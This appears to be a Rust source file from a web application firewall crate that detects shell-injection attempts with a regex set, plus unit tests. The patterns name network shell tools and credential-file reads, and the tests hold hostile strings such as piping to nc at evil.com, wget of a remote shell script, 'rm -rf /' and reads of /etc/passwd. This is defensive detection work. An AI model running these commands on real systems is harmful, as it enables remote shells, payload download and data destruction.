bext-waf 0.2.0

Web Application Firewall for bext — rate limiting, IP filtering, GeoIP, rule engine
Documentation
//! Shell/command injection detection — semicolons, pipes, backticks, `$()`
//! subshells, and common command patterns (`/bin/sh`, `wget`, `curl`).

use std::sync::OnceLock;

use regex::RegexSet;

static SHELL_PATTERNS: OnceLock<RegexSet> = OnceLock::new();

/// Human-readable descriptions, one per shell-injection pattern.
///
/// The entry at index `i` describes the regex at index `i` of the set built
/// by `patterns()`; the two lists must be kept in the same order and length.
static SHELL_DESCRIPTIONS: &[&str] = &[
    "Command chaining with semicolon",
    "Command chaining with pipe",
    "Command chaining with &&",
    "Command chaining with ||",
    "Backtick command substitution",
    "$() command substitution",
    "Shell redirection to file",
    "Shell input redirection",
    // Pattern 8 only matches wget/curl followed by an http(s)/ftp(s) URL, so
    // the description names exactly that rather than a generic command list.
    "Remote download via wget/curl (http/ftp URL)",
    "Environment variable expansion in path",
    "/bin/ or /usr/bin/ command execution",
    "Bash/sh -c invocation",
    "Brace expansion with command ({cmd,args})",
    "Wildcard path abuse (/???/??ss??)",
    "ANSI-C quoting hex escape ($'\\xNN')",
];

/// Returns the process-wide set of shell-injection regexes, compiling it on
/// first use and caching it in `SHELL_PATTERNS`.
///
/// The regex at index `i` corresponds to `SHELL_DESCRIPTIONS[i]`; keep both
/// lists in the same order when adding or removing a rule.
///
/// # Panics
///
/// Panics on first call if any pattern fails to compile. The patterns are
/// compile-time literals, so that would be a programming error.
fn patterns() -> &'static RegexSet {
    SHELL_PATTERNS.get_or_init(|| {
        RegexSet::new([
            // 0: Command chaining with semicolon: "; ls", "; cat", "; rm"
            r";\s*(ls|cat|rm|cp|mv|chmod|chown|wget|curl|whoami|id|uname|pwd|echo|touch|mkdir|kill|ps|nc|ncat|bash|sh|python|perl|ruby|php|node)\b",
            // 1: Command chaining with pipe: "| cat", "| nc"
            r"\|\s*(cat|nc|ncat|sh|bash|tee|head|tail|less|more|grep|awk|sed|sort|python|perl|ruby|php|wget|curl|whoami|id|uname)\b",
            // 2: Command chaining with &&: "&& whoami"
            r"&&\s*(ls|cat|rm|whoami|id|uname|pwd|wget|curl|bash|sh|python|perl|ruby|php|echo|nc|ncat|chmod)\b",
            // 3: Command chaining with ||: "|| id"
            r"\|\|\s*(ls|cat|rm|whoami|id|uname|pwd|wget|curl|bash|sh|python|perl|ruby|php|echo|nc|ncat|chmod)\b",
            // 4: Backtick command substitution: `command`
            r"`[^`]+`",
            // 5: $() command substitution: $(command)
            r"\$\([^)]+\)",
            // 6: Shell output redirection: "> /tmp/file", ">> /etc/passwd"
            r">{1,2}\s*/\w",
            // 7: Shell input redirection: "< /etc/passwd".
            // Whitespace is mandatory so HTML closing tags ("</div>") do not match.
            r"<\s+/\w",
            // 8: wget/curl followed by an http(s)/ftp(s) URL (remote payload download)
            r"(?i)\b(wget|curl)\s+.*(http|ftp)s?://",
            // 9: Environment variable expansion used in paths: "$HOME/x", "${SHELL}/x".
            // The name must start with a letter or underscore so that prices
            // such as "$5/month" are not reported as variable expansion.
            r"\$\{?[A-Za-z_]\w*\}?/",
            // 10: Direct /bin/ or /usr/bin/ command invocation
            r"(?i)/(usr/)?s?bin/(sh|bash|dash|zsh|csh|ksh|python|perl|ruby|php|nc|ncat|wget|curl|cat|ls|rm|chmod|chown|kill|env)\b",
            // 11: bash -c or sh -c invocation
            r"(?i)\b(bash|sh|dash|zsh|ksh)\s+-c\s",
            // 12: Brace expansion: {cat,/etc/passwd}, {ls,-la,/}
            // The command must directly follow "{" and be directly followed by
            // ",". Matching the command name as a substring anywhere inside the
            // braces flagged ordinary JSON such as {"id":1,"a":2}.
            r"\{(cat|ls|rm|cp|mv|chmod|wget|curl|whoami|id|sh|bash|python|perl|nc|echo),",
            // 13: Wildcard path abuse: /???/??ss?? (3+ consecutive ? in path-like context)
            r"/\?{3,}",
            // 14: ANSI-C quoting hex escape: $'\x63\x61\x74'
            r"\$'(\\x[0-9a-fA-F]{2}){2,}'",
        ])
        .expect("shell injection regex patterns must compile")
    })
}

/// Check an input string for shell injection patterns.
///
/// Returns `Some(description)` for the lowest-indexed pattern that matches
/// `input`, or `None` when no pattern matches. If a matching index has no
/// entry in `SHELL_DESCRIPTIONS`, the generic text `"shell injection"` is
/// returned instead.
pub fn check_shell(input: &str) -> Option<String> {
    // Only the first matching index is reported, so take it straight from the
    // match iterator (ascending index order) instead of collecting every
    // match into a temporary Vec on each call.
    patterns().matches(input).into_iter().next().map(|idx| {
        SHELL_DESCRIPTIONS
            .get(idx)
            .copied()
            .unwrap_or("shell injection")
            .to_string()
    })
}

#[cfg(test)]
mod tests {
    //! Unit tests for `check_shell`: one positive test per attack family and
    //! a set of benign inputs that must not be flagged.

    use super::*;

    // ---- Positive detections ----

    #[test]
    fn detects_semicolon_chaining() {
        assert!(check_shell("; ls -la").is_some());
        assert!(check_shell("; cat /etc/passwd").is_some());
        assert!(check_shell("; rm -rf /").is_some());
        assert!(check_shell("; whoami").is_some());
    }

    #[test]
    fn detects_pipe_chaining() {
        assert!(check_shell("| cat /etc/passwd").is_some());
        assert!(check_shell("| nc evil.com 4444").is_some());
        assert!(check_shell("| whoami").is_some());
    }

    #[test]
    fn detects_and_chaining() {
        assert!(check_shell("&& whoami").is_some());
        assert!(check_shell("&& id").is_some());
        assert!(check_shell("&& curl http://evil.com").is_some());
    }

    #[test]
    fn detects_or_chaining() {
        assert!(check_shell("|| id").is_some());
        assert!(check_shell("|| whoami").is_some());
    }

    #[test]
    fn detects_backtick_execution() {
        assert!(check_shell("`whoami`").is_some());
        assert!(check_shell("`cat /etc/passwd`").is_some());
    }

    #[test]
    fn detects_dollar_paren_execution() {
        assert!(check_shell("$(whoami)").is_some());
        assert!(check_shell("$(cat /etc/passwd)").is_some());
    }

    #[test]
    fn detects_output_redirection() {
        assert!(check_shell("> /tmp/shell.txt").is_some());
        assert!(check_shell(">> /var/log/data").is_some());
    }

    #[test]
    fn detects_input_redirection() {
        assert!(check_shell("< /etc/passwd").is_some());
    }

    #[test]
    fn detects_bin_invocation() {
        assert!(check_shell("/bin/sh -c 'id'").is_some());
        assert!(check_shell("/usr/bin/python").is_some());
        assert!(check_shell("/bin/bash").is_some());
    }

    #[test]
    fn detects_bash_c_invocation() {
        assert!(check_shell("bash -c 'echo hacked'").is_some());
        assert!(check_shell("sh -c whoami").is_some());
    }

    #[test]
    fn detects_wget_curl_download() {
        assert!(check_shell("wget http://evil.com/shell.sh").is_some());
        assert!(check_shell("curl https://evil.com/payload").is_some());
    }

    #[test]
    fn detects_env_variable_in_path() {
        assert!(check_shell("$HOME/malware").is_some());
        assert!(check_shell("${SHELL}/exec").is_some());
    }

    #[test]
    fn detects_brace_expansion() {
        assert!(check_shell("{cat,/etc/passwd}").is_some());
        assert!(check_shell("{ls,-la,/}").is_some());
    }

    #[test]
    fn detects_wildcard_path_abuse() {
        assert!(check_shell("/???/??t /???/p??s??").is_some());
    }

    #[test]
    fn detects_ansi_c_hex_quoting() {
        assert!(check_shell(r"$'\x63\x61\x74'").is_some());
    }

    // ---- Reported description ----

    #[test]
    fn reports_description_of_matching_pattern() {
        // Backticks match only the backtick rule, so its description is returned.
        assert_eq!(
            check_shell("`whoami`").as_deref(),
            Some("Backtick command substitution")
        );
    }

    // ---- False-positive checks ----

    #[test]
    fn allows_normal_text() {
        assert!(check_shell("Hello, how are you today?").is_none());
    }

    #[test]
    fn allows_normal_path() {
        assert!(check_shell("/api/users/123").is_none());
    }

    #[test]
    fn allows_normal_json() {
        assert!(check_shell(r#"{"name":"John","items":[1,2,3]}"#).is_none());
    }

    #[test]
    fn allows_css_selectors() {
        assert!(check_shell("div > span").is_none());
    }

    #[test]
    fn allows_normal_url() {
        assert!(check_shell("https://example.com/page?q=test").is_none());
    }

    #[test]
    fn allows_semicolon_in_css() {
        assert!(check_shell("color: red; font-size: 14px").is_none());
    }

    #[test]
    fn allows_html_closing_tag() {
        // Input redirection requires whitespace after '<', so "</p>" is benign.
        assert!(check_shell("<p>hello</p>").is_none());
    }
}